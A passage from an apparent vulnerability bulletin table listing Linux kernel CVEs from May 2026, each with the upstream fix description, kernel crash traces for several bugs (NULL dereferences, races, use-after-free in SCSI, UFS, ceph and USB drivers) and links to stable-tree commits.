Inc. Lemans EVK (DT) [ 48.316782] Workqueue: pdr_notifier_wq pdr_notifier_work [pdr_interface] [ 48.323672] pstate: 20400005 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 48.330825] pc : mutex_lock+0xc/0x54 [ 48.334514] lr : soc_dapm_shutdown_dapm+0x44/0x174 [snd_soc_core] [ 48.340794] sp : ffff800084ddb7b0 [ 48.344207] x29: ffff800084ddb7b0 x28: ffff00009cd9cf30 x27: ffff00009cd9cc00 [ 48.351544] x26: ffff000099610190 x25: ffffa31d2f19c810 x24: ffffa31d2f185098 [ 48.358869] x23: ffff800084ddb7f8 x22: 0000000000000000 x21: 00000000000000d0 [ 48.366198] x20: ffff00009ba6c338 x19: ffff00009ba6c338 x18: 00000000ffffffff [ 48.373528] x17: 000000040044ffff x16: ffffa31d4ae6dca8 x15: 072007740775076f [ 48.380853] x14: 0765076d07690774 x13: 00313a323a656369 x12: 767265733a637673 [ 48.388182] x11: 00000000000003f9 x10: ffffa31d4c7dea98 x9 : 0000000000000001 [ 48.395519] x8 : ffff00009a2aadc0 x7 : 0000000000000003 x6 : 0000000000000000 [ 48.402854] x5 : 0000000000000 ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43412 | https://git.kernel.org/stable/c/94bda21adb2a51f69366b847b4d80dfe50bd9fb9 https://git.kernel.org/stable/c/a8e9cab16771b15160465783507496dc83742d8e https://git.kernel.org/stable/c/0da170b9e600da6930cfb8352e4cc036db3b6159 https://git.kernel.org/stable/c/22b05abb17e3c6ef45035141fe3d26f815ff9d30 https://git.kernel.org/stable/c/897f32cab7945f4662a50b3841ba31c6c3204876 https://git.kernel.org/stable/c/d6db827b430bdcca3976cebca7bd69cca03cde2c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: hisi_sas: Fix NULL pointer exception during user_scan() user_scan() invokes updated sas_user_scan() for channel 0, and if successful, iteratively scans remaining channels (1 to shost->max_channel) via scsi_scan_host_selected() in commit 37c4e72b0651 ("scsi: Fix sas_user_scan() to handle wildcard and multi-channel scans"). However, hisi_sas supports only one channel, and the current value of max_channel is 1. sas_user_scan() for channel 1 will trigger the following NULL pointer exception: [ 441.554662] Unable to handle kernel NULL pointer dereference at virtual address 00000000000008b0 [ 441.554699] Mem abort info: [ 441.554710] ESR = 0x0000000096000004 [ 441.554718] EC = 0x25: DABT (current EL), IL = 32 bits [ 441.554723] SET = 0, FnV = 0 [ 441.554726] EA = 0, S1PTW = 0 [ 441.554730] FSC = 0x04: level 0 translation fault [ 441.554735] Data abort info: [ 441.554737] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 [ 441.554742] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 441.554747] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 441.554752] user pgtable: 4k pages, 48-bit VAs, pgdp=00000828377a6000 [ 441.554757] [00000000000008b0] pgd=0000000000000000, p4d=0000000000000000 [ 441.554769] Internal error: Oops: 0000000096000004 [#1] SMP [ 441.629589] Modules linked in: arm_spe_pmu arm_smmuv3_pmu tpm_tis_spi hisi_uncore_sllc_pmu hisi_uncore_pa_pmu hisi_uncore_l3c_pmu hisi_uncore_hha_pmu hisi_uncore_ddrc_pmu hisi_uncore_cpa_pmu hns3_pmu hisi_ptt hisi_pcie_pmu tpm_tis_core spidev spi_hisi_sfc_v3xx hisi_uncore_pmu spi_dw_mmio fuse hclge hclge_common hisi_sec2 hisi_hpre hisi_zip hisi_qm hns3 hisi_sas_v3_hw sm3_ce sbsa_gwdt hnae3 hisi_sas_main uacce hisi_dma i2c_hisi dm_mirror dm_region_hash dm_log dm_mod [ 441.670819] CPU: 46 UID: 0 PID: 6994 Comm: bash Kdump: loaded Not tainted 7.0.0-rc2+ #84 PREEMPT [ 441.691327] pstate: 81400009 (Nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 441.698277] pc : sas_find_dev_by_rphy+0x44/0x118 [ 441.702896] lr : sas_find_dev_by_rphy+0x3c/0x118 [ 441.707502] sp : ffff80009abbba40 [ 441.710805] x29: ffff80009abbba40 x28: ffff082819a40008 x27: ffff082810c37c08 [ 441.717930] x26: ffff082810c37c28 x25: ffff082819a40290 x24: ffff082810c37c00 [ 441.725054] x23: 0000000000000000 x22: 0000000000000001 x21: ffff082819a40000 [ 441.732179] x20: ffff082819a40290 x19: 0000000000000000 x18: 0000000000000020 [ 441.739304] x17: 0000000000000000 x16: ffffb5dad6bda690 x15: 00000000ffffffff [ 441.746428] x14: ffff082814c3b26c x13: 00000000ffffffff x12: ffff082814c3b26a [ 441.753553] x11: 00000000000000c0 x10: 000000000000003a x9 : ffffb5dad5ea94f4 [ 441.760678] x8 : 000000000000003a x7 : ffff80009abbbab0 x6 : 0000000000000030 [ 441.767802] x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 [ 441.774926] x2 : ffff08280f35a300 x1 : ffffb5dad7127180 x0 : 0000000000000000 [ 441.782053] Call trace: [ 441.784488] sas_find_dev_by_rphy+0x44/0x118 (P) [ 441.789095] sas_target_alloc+0x24/0xb0 [ 441.792920] scsi_alloc_target+0x290/0x330 [ 441.797010] __scsi_scan_target+0x88/0x258 [ 441.801096] scsi_scan_channel+0x74/0xb8 [ 441.805008] scsi_scan_host_selected+0x170/0x188 [ 441.809615] sas_user_scan+0xfc/0x148 [ 441.813267] store_scan+0x10c/0x180 [ 441.816743] dev_attr_store+0x20/0x40 [ 441.820398] sysfs_kf_write+0x84/0xa8 [ 441.824054] kernfs_fop_write_iter+0x130/0x1c8 [ 441.828487] vfs_write+0x2c0/0x370 [ 441.831880] ksys_write+0x74/0x118 [ 441.835271] __arm64_sys_write+0x24/0x38 [ 441.839182] invoke_syscall+0x50/0x120 [ 441.842919] el0_svc_common.constprop.0+0xc8/0xf0 [ 441.847611] do_el0_svc+0x24/0x38 [ 441.850913] el0_svc+0x38/0x158 [ 441.854043] el0t_64_sync_handler+0xa0/0xe8 [ 441.858214] el0t_64_sync+0x1ac/0x1b0 [ 441.861865] Code: aa1303e0 97ff70a8 34ffff80 d10a4273 (f9445a75) [ 441.867946] ---[ end trace 0000000000000000 ]--- Therefore ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43413 | https://git.kernel.org/stable/c/70c78429ef383e35f9c58848994aeeac8083ae35 https://git.kernel.org/stable/c/40119a21d9769bf8fdab5c93c6c878296e628abf https://git.kernel.org/stable/c/21a13db8d449b9c7eda4471da7f12417602dbbc7 https://git.kernel.org/stable/c/beadac156610a4f3bb15cb7bb4b07b6ac06f6567 https://git.kernel.org/stable/c/8ddc0c26916574395447ebf4cff684314f6873a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Fix SError in ufshcd_rtc_work() during UFS suspend In __ufshcd_wl_suspend(), cancel_delayed_work_sync() is called to cancel the UFS RTC work, but it is placed after ufshcd_vops_suspend(hba, pm_op, POST_CHANGE). This creates a race condition where ufshcd_rtc_work() can still be running while ufshcd_vops_suspend() is executing. When UFSHCD_CAP_CLK_GATING is not supported, the condition !hba->clk_gating.active_reqs is always true, causing ufshcd_update_rtc() to be executed. Since ufshcd_vops_suspend() typically performs clock gating operations, executing ufshcd_update_rtc() at that moment triggers an SError. The kernel panic trace is as follows: Kernel panic - not syncing: Asynchronous SError Interrupt Call trace: dump_backtrace+0xec/0x128 show_stack+0x18/0x28 dump_stack_lvl+0x40/0xa0 dump_stack+0x18/0x24 panic+0x148/0x374 nmi_panic+0x3c/0x8c arm64_serror_panic+0x64/0x8c do_serror+0xc4/0xc8 el1h_64_error_handler+0x34/0x4c el1h_64_error+0x68/0x6c el1_interrupt+0x20/0x58 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x68/0x6c ktime_get+0xc4/0x12c ufshcd_mcq_sq_stop+0x4c/0xec ufshcd_mcq_sq_cleanup+0x64/0x1dc ufshcd_clear_cmd+0x38/0x134 ufshcd_issue_dev_cmd+0x298/0x4d0 ufshcd_exec_dev_cmd+0x1a4/0x1c4 ufshcd_query_attr+0xbc/0x19c ufshcd_rtc_work+0x10c/0x1c8 process_scheduled_works+0x1c4/0x45c worker_thread+0x32c/0x3e8 kthread+0x120/0x1d8 ret_from_fork+0x10/0x20 Fix this by moving cancel_delayed_work_sync() before the call to ufshcd_vops_suspend(hba, pm_op, PRE_CHANGE), ensuring the UFS RTC work is fully completed or cancelled at that point. | 2026-05-08 | not yet calculated | CVE-2026-43415 | https://git.kernel.org/stable/c/a6a894413b043704b77a6294c379c93b1477e48d https://git.kernel.org/stable/c/2fcc2fc21cae7a0cbe73053f7fc70680ce2a7f69 https://git.kernel.org/stable/c/b17211b512cbf0e07de27e1932428ee6c20df910 https://git.kernel.org/stable/c/c387a8f1d3713f6b0415ece8485042d0f134b91a https://git.kernel.org/stable/c/b0bd84c39289ef6a6c3827dd52c875659291970a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc, perf: Check that current->mm is alive before getting user callchain It may happen that mm is already released, which leads to kernel panic. This adds the NULL check for current->mm, similarly to commit 20afc60f892d ("x86, perf: Check that current->mm is alive before getting user callchain"). I was getting this panic when running a profiling BPF program (profile.py from bcc-tools): [26215.051935] Kernel attempted to read user page (588) - exploit attempt? (uid: 0) [26215.051950] BUG: Kernel NULL pointer dereference on read at 0x00000588 [26215.051952] Faulting instruction address: 0xc00000000020fac0 [26215.051957] Oops: Kernel access of bad area, sig: 11 [#1] [...] [26215.052049] Call Trace: [26215.052050] [c000000061da6d30] [c00000000020fc10] perf_callchain_user_64+0x2d0/0x490 (unreliable) [26215.052054] [c000000061da6dc0] [c00000000020f92c] perf_callchain_user+0x1c/0x30 [26215.052057] [c000000061da6de0] [c0000000005ab2a0] get_perf_callchain+0x100/0x360 [26215.052063] [c000000061da6e70] [c000000000573bc8] bpf_get_stackid+0x88/0xf0 [26215.052067] [c000000061da6ea0] [c008000000042258] bpf_prog_16d4ab9ab662f669_do_perf_event+0xf8/0x274 [...] In addition, move storing the top-level stack entry to generic perf_callchain_user to make sure the top-evel entry is always captured, even if current->mm is NULL. [Maddy: fixed message to avoid checkpatch format style error] | 2026-05-08 | not yet calculated | CVE-2026-43416 | https://git.kernel.org/stable/c/98074e16742ae87fb82e234b419783c5ffc9baea https://git.kernel.org/stable/c/7e5f60b8cfc02a2b23a40a5f5fd2fa81d010e737 https://git.kernel.org/stable/c/e9bbfb4bfa86c6b5515b868d6982ac60505d7e39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/mmcid: Handle vfork()/CLONE_VM correctly Matthieu and Jiri reported stalls where a task endlessly loops in mm_get_cid() when scheduling in. It turned out that the logic which handles vfork()'ed tasks is broken. It is invoked when the number of tasks associated to a process is smaller than the number of MMCID users. It then walks the task list to find the vfork()'ed task, but accounts all the already processed tasks as well. If that double processing brings the number of to be handled tasks to 0, the walk stops and the vfork()'ed task's CID is not fixed up. As a consequence a subsequent schedule in fails to acquire a (transitional) CID and the machine stalls. Cure this by removing the accounting condition and make the fixup always walk the full task list if it could not find the exact number of users in the process' thread list. | 2026-05-08 | not yet calculated | CVE-2026-43417 | https://git.kernel.org/stable/c/e6761cdce78a8919a537989afb6aaf6881469f83 https://git.kernel.org/stable/c/28b5a1395036d6c7a6c8034d85ad3d7d365f192c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/mmcid: Prevent CID stalls due to concurrent forks A newly forked task is accounted as MMCID user before the task is visible in the process' thread list and the global task list. This creates the following problem: CPU1 CPU2 fork() sched_mm_cid_fork(tnew1) tnew1->mm.mm_cid_users++; tnew1->mm_cid.cid = getcid() -> preemption fork() sched_mm_cid_fork(tnew2) tnew2->mm.mm_cid_users++; // Reaches the per CPU threshold mm_cid_fixup_tasks_to_cpus() for_each_other(current, p) .... As tnew1 is not visible yet, this fails to fix up the already allocated CID of tnew1. As a consequence a subsequent schedule in might fail to acquire a (transitional) CID and the machine stalls. Move the invocation of sched_mm_cid_fork() after the new task becomes visible in the thread and the task list to prevent this. This also makes it symmetrical vs. exit() where the task is removed as CID user before the task is removed from the thread and task lists. | 2026-05-08 | not yet calculated | CVE-2026-43418 | https://git.kernel.org/stable/c/f0189d49282e0458f3a737bd486c1ec048148f66 https://git.kernel.org/stable/c/b2e48c429ec54715d16fefa719dd2fbded2e65be |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix memory leaks in ceph_mdsc_build_path() Add __putname() calls to error code paths that did not free the "path" pointer obtained by __getname(). If ownership of this pointer is not passed to the caller via path_info.path, the function must free it before returning. | 2026-05-08 | not yet calculated | CVE-2026-43419 | https://git.kernel.org/stable/c/657dc653b06a3cc0282aea447a3f137fa94066a4 https://git.kernel.org/stable/c/5895d0164c84d7fec6abc198920c257f55c51899 https://git.kernel.org/stable/c/097cd68f46686391a98f2618188f0cb7b7570de2 https://git.kernel.org/stable/c/13b8b9d6f59ef17fb96c298c3a0d62a8306950cc https://git.kernel.org/stable/c/040d159a45ded7f33201421a81df0aa2a86e5a0b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix i_nlink underrun during async unlink During async unlink, we drop the `i_nlink` counter before we receive the completion (that will eventually update the `i_nlink`) because "we assume that the unlink will succeed". That is not a bad idea, but it races against deletions by other clients (or against the completion of our own unlink) and can lead to an underrun which emits a WARNING like this one: WARNING: CPU: 85 PID: 25093 at fs/inode.c:407 drop_nlink+0x50/0x68 Modules linked in: CPU: 85 UID: 3221252029 PID: 25093 Comm: php-cgi8.1 Not tainted 6.14.11-cm4all1-ampere #655 Hardware name: Supermicro ARS-110M-NR/R12SPD-A, BIOS 1.1b 10/17/2023 pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : drop_nlink+0x50/0x68 lr : ceph_unlink+0x6c4/0x720 sp : ffff80012173bc90 x29: ffff80012173bc90 x28: ffff086d0a45aaf8 x27: ffff0871d0eb5680 x26: ffff087f2a64a718 x25: 0000020000000180 x24: 0000000061c88647 x23: 0000000000000002 x22: ffff07ff9236d800 x21: 0000000000001203 x20: ffff07ff9237b000 x19: ffff088b8296afc0 x18: 00000000f3c93365 x17: 0000000000070000 x16: ffff08faffcbdfe8 x15: ffff08faffcbdfec x14: 0000000000000000 x13: 45445f65645f3037 x12: 34385f6369706f74 x11: 0000a2653104bb20 x10: ffffd85f26d73290 x9 : ffffd85f25664f94 x8 : 00000000000000c0 x7 : 0000000000000000 x6 : 0000000000000002 x5 : 0000000000000081 x4 : 0000000000000481 x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff08727d3f91e8 Call trace: drop_nlink+0x50/0x68 (P) vfs_unlink+0xb0/0x2e8 do_unlinkat+0x204/0x288 __arm64_sys_unlinkat+0x3c/0x80 invoke_syscall.constprop.0+0x54/0xe8 do_el0_svc+0xa4/0xc8 el0_svc+0x18/0x58 el0t_64_sync_handler+0x104/0x130 el0t_64_sync+0x154/0x158 In ceph_unlink(), a call to ceph_mdsc_submit_request() submits the CEPH_MDS_OP_UNLINK to the MDS, but does not wait for completion. Meanwhile, between this call and the following drop_nlink() call, a worker thread may process a CEPH_CAP_OP_IMPORT, CEPH_CAP_OP_GRANT or just a CEPH_MSG_CLIENT_REPLY (the latter of which could be our own completion). These will lead to a set_nlink() call, updating the `i_nlink` counter to the value received from the MDS. If that new `i_nlink` value happens to be zero, it is illegal to decrement it further. But that is exactly what ceph_unlink() will do then. The WARNING can be reproduced this way: 1. Force async unlink; only the async code path is affected. Having no real clue about Ceph internals, I was unable to find out why the MDS wouldn't give me the "Fxr" capabilities, so I patched get_caps_for_async_unlink() to always succeed. (Note that the WARNING dump above was found on an unpatched kernel, without this kludge - this is not a theoretical bug.) 2. Add a sleep call after ceph_mdsc_submit_request() so the unlink completion gets handled by a worker thread before drop_nlink() is called. This guarantees that the `i_nlink` is already zero before drop_nlink() runs. The solution is to skip the counter decrement when it is already zero, but doing so without a lock is still racy (TOCTOU). Since ceph_fill_inode() and handle_cap_grant() both hold the `ceph_inode_info.i_ceph_lock` spinlock while set_nlink() runs, this seems like the proper lock to protect the `i_nlink` updates. I found prior art in NFS and SMB (using `inode.i_lock`) and AFS (using `afs_vnode.cb_lock`). All three have the zero check as well. | 2026-05-08 | not yet calculated | CVE-2026-43420 | https://git.kernel.org/stable/c/9b31e88ac5623d15c8bc46f69dfe1d3b43a8f67c https://git.kernel.org/stable/c/6d5fd8bb574bef039eb3b738e523870433a2aeb9 https://git.kernel.org/stable/c/fcc477a6e8856c8a42b3c9e171724d8d6dfadd06 https://git.kernel.org/stable/c/b3f5513141ecc6b277a8f7b7efe58a0cf9a5e859 https://git.kernel.org/stable/c/aedd29386b23f3e1e6818943e11abfff2953732f https://git.kernel.org/stable/c/7db008e85a5d17b64bc5390b828bf457ae91a415 https://git.kernel.org/stable/c/8975b85b0d45ca811ace6fac5907652f2310e5ac https://git.kernel.org/stable/c/ce0123cbb4a40a2f1bbb815f292b26e96088639f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_ncm: Fix net_device lifecycle with device_move The network device outlived its parent gadget device during disconnection, resulting in dangling sysfs links and null pointer dereference problems. A prior attempt to solve this by removing SET_NETDEV_DEV entirely [1] was reverted due to power management ordering concerns and a NO-CARRIER regression. A subsequent attempt to defer net_device allocation to bind [2] broke 1:1 mapping between function instance and network device, making it impossible for configfs to report the resolved interface name. This results in a regression where the DHCP server fails on pmOS. Use device_move to reparent the net_device between the gadget device and /sys/devices/virtual/ across bind/unbind cycles. This preserves the network interface across USB reconnection, allowing the DHCP server to retain their binding. Introduce gether_attach_gadget()/gether_detach_gadget() helpers and use __free(detach_gadget) macro to undo attachment on bind failure. The bind_count ensures device_move executes only on the first bind. [1] https://lore.kernel.org/lkml/f2a4f9847617a0929d62025748384092e5f35cce.camel@crapouillou.net/ [2] https://lore.kernel.org/linux-usb/795ea759-7eaf-4f78-81f4-01ffbf2d7961@ixit.cz/ | 2026-05-08 | not yet calculated | CVE-2026-43421 | https://git.kernel.org/stable/c/93f116c3393a22acab96ad1bef12b2572eb80ca4 https://git.kernel.org/stable/c/e584cb58a2ea7ff4d3a4bc43d5ca512ed3ecb77d https://git.kernel.org/stable/c/85acaba2f42b557499bab3608307f17bf13beb69 https://git.kernel.org/stable/c/ec35c1969650e7cb6c8a91020e568ed46e3551b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: legacy: ncm: Fix NPE in gncm_bind Commit 56a512a9b410 ("usb: gadget: f_ncm: align net_device lifecycle with bind/unbind") deferred the allocation of the net_device. This change leads to a NULL pointer dereference in the legacy NCM driver as it attempts to access the net_device before it's fully instantiated. Store the provided qmult, host_addr, and dev_addr into the struct ncm_opts->net_opts during gncm_bind(). These values will be properly applied to the net_device when it is allocated and configured later in the binding process by the NCM function driver. | 2026-05-08 | not yet calculated | CVE-2026-43422 | https://git.kernel.org/stable/c/be5738d19bed244ede84da45bc45395bcb1d99e0 https://git.kernel.org/stable/c/b23e86a3a15803c3dcb24701285f73e65099fdf9 https://git.kernel.org/stable/c/fde0634ad9856b3943a2d1a8cc8de174a63ac840 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_ncm: Fix atomic context locking issue The ncm_set_alt function was holding a mutex to protect against races with configfs, which invokes the might-sleep function inside an atomic context. Remove the struct net_device pointer from the f_ncm_opts structure to eliminate the contention. The connection state is now managed by a new boolean flag to preserve the use-after-free fix from commit 6334b8e4553c ("usb: gadget: f_ncm: Fix UAF ncm object at re-bind after usb ep transport error"). BUG: sleeping function called from invalid context Call Trace: dump_stack_lvl+0x83/0xc0 dump_stack+0x14/0x16 __might_resched+0x389/0x4c0 __might_sleep+0x8e/0x100 ... __mutex_lock+0x6f/0x1740 ... ncm_set_alt+0x209/0xa40 set_config+0x6b6/0xb40 composite_setup+0x734/0x2b40 ... | 2026-05-08 | not yet calculated | CVE-2026-43423 | https://git.kernel.org/stable/c/e533a44fb1b337d14f772585b67328bee2e0b5e3 https://git.kernel.org/stable/c/e95120b4b95ef1c16d8e94e201ae89f5e59e2612 https://git.kernel.org/stable/c/0d6c8144ca4d93253de952a5ea0028c19ed7ab68 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_tcm: Fix NULL pointer dereferences in nexus handling The `tpg->tpg_nexus` pointer in the USB Target driver is dynamically managed and tied to userspace configuration via ConfigFS. It can be NULL if the USB host sends requests before the nexus is fully established or immediately after it is dropped. Currently, functions like `bot_submit_command()` and the data transfer paths retrieve `tv_nexus = tpg->tpg_nexus` and immediately dereference `tv_nexus->tvn_se_sess` without any validation. If a malicious or misconfigured USB host sends a BOT (Bulk-Only Transport) command during this race window, it triggers a NULL pointer dereference, leading to a kernel panic (local DoS). This exposes an inconsistent API usage within the module, as peer functions like `usbg_submit_command()` and `bot_send_bad_response()` correctly implement a NULL check for `tv_nexus` before proceeding. Fix this by bringing consistency to the nexus handling. Add the missing `if (!tv_nexus)` checks to the vulnerable BOT command and request processing paths, aborting the command gracefully with an error instead of crashing the system. | 2026-05-08 | not yet calculated | CVE-2026-43424 | https://git.kernel.org/stable/c/b9b26d7f3aa288cfa54a7bc68612bab1f153f156 https://git.kernel.org/stable/c/2a2ef846a54a06c33b5c2d4b0d918583e1e7c0b7 https://git.kernel.org/stable/c/d146f27758049fa55ae4c53785a852d3cf7a18d6 https://git.kernel.org/stable/c/f962ca3b020e13d6714f27e8c36fe742441c58d1 https://git.kernel.org/stable/c/679d9535aeb15c10bce89c44102004b96624d706 https://git.kernel.org/stable/c/3d309b37633c4a847fc149939a2c9576f1aa1065 https://git.kernel.org/stable/c/b9fde507355342a2d64225d582dc8b98ff5ecb19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: image: mdc800: kill download URB on timeout mdc800_device_read() submits download_urb and waits for completion. If the timeout fires and the device has not responded, the function returns without killing the URB, leaving it active. A subsequent read() resubmits the same URB while it is still in-flight, triggering the WARN in usb_submit_urb(): "URB submitted while active" Check the return value of wait_event_timeout() and kill the URB if it indicates timeout, ensuring the URB is complete before its status is inspected or the URB is resubmitted. Similar to - commit 372c93131998 ("USB: yurex: fix control-URB timeout handling") - commit b98d5000c505 ("media: rc: iguanair: handle timeouts") | 2026-05-08 | not yet calculated | CVE-2026-43425 | https://git.kernel.org/stable/c/9fa5a49760979ba016506fe292a431c8b83f043e https://git.kernel.org/stable/c/15536f6c15f48037a1672cbdea53266d67861ff6 https://git.kernel.org/stable/c/9bf877cc67309b2a063b0087c3ad8585fb11cec3 https://git.kernel.org/stable/c/155f471e38aa516f6c58c2ae03ca3dc222fa2fdb https://git.kernel.org/stable/c/d4a400a6a4c4d49f77a04a3f401df5ae1a10657c https://git.kernel.org/stable/c/b7fed917f84e484e06c5e9926746d0b524e3a93e https://git.kernel.org/stable/c/cc7398447810c9450c90d092efe9997569f8d96f https://git.kernel.org/stable/c/1be3b77de4eb89af8ae2fd6610546be778e25589 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: renesas_usbhs: fix use-after-free in ISR during device removal In usbhs_remove(), the driver frees resources (including the pipe array) while the interrupt handler (usbhs_interrupt) is still registered. If an interrupt fires after usbhs_pipe_remove() but before the driver is fully unbound, the ISR may access freed memory, causing a use-after-free. Fix this by calling devm_free_irq() before freeing resources. This ensures the interrupt handler is both disabled and synchronized (waits for any running ISR to complete) before usbhs_pipe_remove() is called. | 2026-05-08 | not yet calculated | CVE-2026-43426 | https://git.kernel.org/stable/c/c7012fc73dab4829404fedeeaa8531f12ac8545f https://git.kernel.org/stable/c/51afaf919bbaacdd9cc9e146033ae0a743a42dd7 https://git.kernel.org/stable/c/1899edac312ef17a7234851686e8a703f56d0a84 https://git.kernel.org/stable/c/9c6159d5b72d5fc265cce5da04f27d730b552e69 https://git.kernel.org/stable/c/6287e0c01ccb818e7214f88d885ffb7c9e81b0e0 https://git.kernel.org/stable/c/0b7d11fd6e742ecc0b1eca44b4f0b93140c74bae https://git.kernel.org/stable/c/6ffe44f022c95b1b29c691d2169c5abc046f7580 https://git.kernel.org/stable/c/3cbc242b88c607f55da3d0d0d336b49bf1e20412 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: class: cdc-wdm: fix reordering issue in read code path Quoting the bug report: Due to compiler optimization or CPU out-of-order execution, the desc->length update can be reordered before the memmove. If this happens, wdm_read() can see the new length and call copy_to_user() on uninitialized memory. This also violates LKMM data race rules [1]. Fix it by using WRITE_ONCE and memory barriers. | 2026-05-08 | not yet calculated | CVE-2026-43427 | https://git.kernel.org/stable/c/638328ca9c17ae6511ad62198c57bae32ffa3c91 https://git.kernel.org/stable/c/170e8daca24da6edb4be82ab01abf44e87af387b https://git.kernel.org/stable/c/c8fa96ed021923dae147bcd9f9205b8df7b82360 https://git.kernel.org/stable/c/4ee3062bf2c9a722afef429826e8607eaf3fc6a0 https://git.kernel.org/stable/c/276aef0fd2b92f41b920ac891c72cadeee957934 https://git.kernel.org/stable/c/67ed312124bb1b61858778ac0b985b48961c862a https://git.kernel.org/stable/c/e3c874b05901dc519054b5107d16620e6d2b5fea https://git.kernel.org/stable/c/8df672bfe3ec2268c2636584202755898e547173 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: core: Limit the length of unkillable synchronous timeouts The usb_control_msg(), usb_bulk_msg(), and usb_interrupt_msg() APIs in usbcore allow unlimited timeout durations. And since they use uninterruptible waits, this leaves open the possibility of hanging a task for an indefinitely long time, with no way to kill it short of unplugging the target device. To prevent this sort of problem, enforce a maximum limit on the length of these unkillable timeouts. The limit chosen here, somewhat arbitrarily, is 60 seconds. On many systems (although not all) this is short enough to avoid triggering the kernel's hung-task detector. In addition, clear up the ambiguity of negative timeout values by treating them the same as 0, i.e., using the maximum allowed timeout. | 2026-05-08 | not yet calculated | CVE-2026-43428 | https://git.kernel.org/stable/c/4e86f5b79e62ded7e3c3ebd688cf5775e618148a https://git.kernel.org/stable/c/06d2bbc4c66c6b0e8a43728c4949026026a5be67 https://git.kernel.org/stable/c/6c62935670acdbb7687ced20494923b66fbb0367 https://git.kernel.org/stable/c/659c0c7d50a4b0f6aa197c4c098cfd91daf63862 https://git.kernel.org/stable/c/24b31a227f679a942d820840a4dea7f0c09a387f https://git.kernel.org/stable/c/64f3d75633aedc12bdff220e9a4337177430bd9d https://git.kernel.org/stable/c/2d34cb4d1d6283b4be9c78f4a83ed6956d3069ec https://git.kernel.org/stable/c/1015c27a5e1a63efae2b18a9901494474b4d1dc3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: usbtmc: Use usb_bulk_msg_killable() with user-specified timeouts The usbtmc driver accepts timeout values specified by the user in an ioctl command, and uses these timeouts for some usb_bulk_msg() calls. Since the user can specify arbitrarily long timeouts and usb_bulk_msg() uses unkillable waits, call usb_bulk_msg_killable() instead to avoid the possibility of the user hanging a kernel thread indefinitely. | 2026-05-08 | not yet calculated | CVE-2026-43429 | https://git.kernel.org/stable/c/e14a0dcdf468c3ad616bb06696c7c64c36e736d8 https://git.kernel.org/stable/c/7fa72c369c23c27d1f64883c1e276af950557fb1 https://git.kernel.org/stable/c/72c0a063489be183cfb99e7050aaef503bdb6449 https://git.kernel.org/stable/c/39bd4097292fd8564cf2cfba9356f8ab11e38d12 https://git.kernel.org/stable/c/0535f84cb94c9d8bcba0a2a5b3fac81b7d97235d https://git.kernel.org/stable/c/6cb7dc91f057dd8ce44f6caa2995d8e22784ed0a https://git.kernel.org/stable/c/d4f1c45bdff3f393f9ab7e76795901c442b9eb76 https://git.kernel.org/stable/c/7784caa413a89487dd14dd5c41db8753483b2acb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: yurex: fix race in probe The bbu member of the descriptor must be set to the value standing for uninitialized values before the URB whose completion handler sets bbu is submitted. Otherwise there is a window during which probing can overwrite already retrieved data. | 2026-05-08 | not yet calculated | CVE-2026-43430 | https://git.kernel.org/stable/c/a7934d7202a39c3160aa30521c382c7b744ae4a2 https://git.kernel.org/stable/c/a8b3b3d730acea1640bc89465f2832cf06a1e13a https://git.kernel.org/stable/c/687d26d43a5aaf44323ce7d601cf242bb87e9559 https://git.kernel.org/stable/c/939e3d17b843b0bae70467fef4481069d73c8520 https://git.kernel.org/stable/c/3cec135415a89723e2d38e1c8cc5098203355965 https://git.kernel.org/stable/c/a41d3d9202e951995cfac6248c565423079c71fa https://git.kernel.org/stable/c/af83e92c329f11139d5eea2b5b7b83c26c3f67e7 https://git.kernel.org/stable/c/7a875c09899ba0404844abfd8f0d54cdc481c151 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xhci: Fix NULL pointer dereference when reading portli debugfs files Michal reported and debgged a NULL pointer dereference bug in the recently added portli debugfs files Oops is caused when there are more port registers counted in xhci->max_ports than ports reported by Supported Protocol capabilities. This is possible if max_ports is more than maximum port number, or if there are gaps between ports of different speeds the 'Supported Protocol' capabilities. In such cases port->rhub will be NULL so we can't reach xhci behind it. Add an explicit NULL check for this case, and print portli in hex without dereferencing port->rhub. | 2026-05-08 | not yet calculated | CVE-2026-43431 | https://git.kernel.org/stable/c/9c8bef223c6e991276188d30d74bdb2cbd8be652 https://git.kernel.org/stable/c/ae4ff9dead5efa2025eddfcdb29411432bf40a7c |
